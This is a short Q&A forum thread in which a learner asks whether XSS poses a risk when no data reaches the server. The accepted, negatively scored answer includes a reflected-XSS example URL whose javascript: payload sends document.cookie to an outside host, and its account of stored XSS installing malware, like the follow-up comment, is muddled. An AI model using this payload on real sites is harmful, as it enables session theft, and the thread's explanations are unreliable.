# Is there any danger of XSS in an open web application if no information is sent to the server?

Tags: security, xss

I am currently learning about XSS.

Is there any danger of XSS in an open web application if no information is sent to the server?

Answer (score -1, accepted):

depends on the type of XSS if it is a
Reflected XSS then it can work with other users for example take

```
URL: https://example.com/?redirect_uri=javascript:fetch("https://example.com/"+document.cookie)
```

this can affect other users as their cookies will be sent to a remote server

but if it's a stored XSS the data or the value will be stored most of the time if the XSS includes a malware download and install code then there will be malware installed on all the visitors of the page and if possible the server can also install the malware making this too dangerous

Comment: Thank you!! For example, if the input values are not sent to the server or not displayed on the screen, is there any risk?

Comment: it's not always the case mostly if there is no reflection via alert messages or via popups not available it might also be a stored XSS this is a serious threat if there are no viewable changes in the webpage there is a chance the payload failed to execute.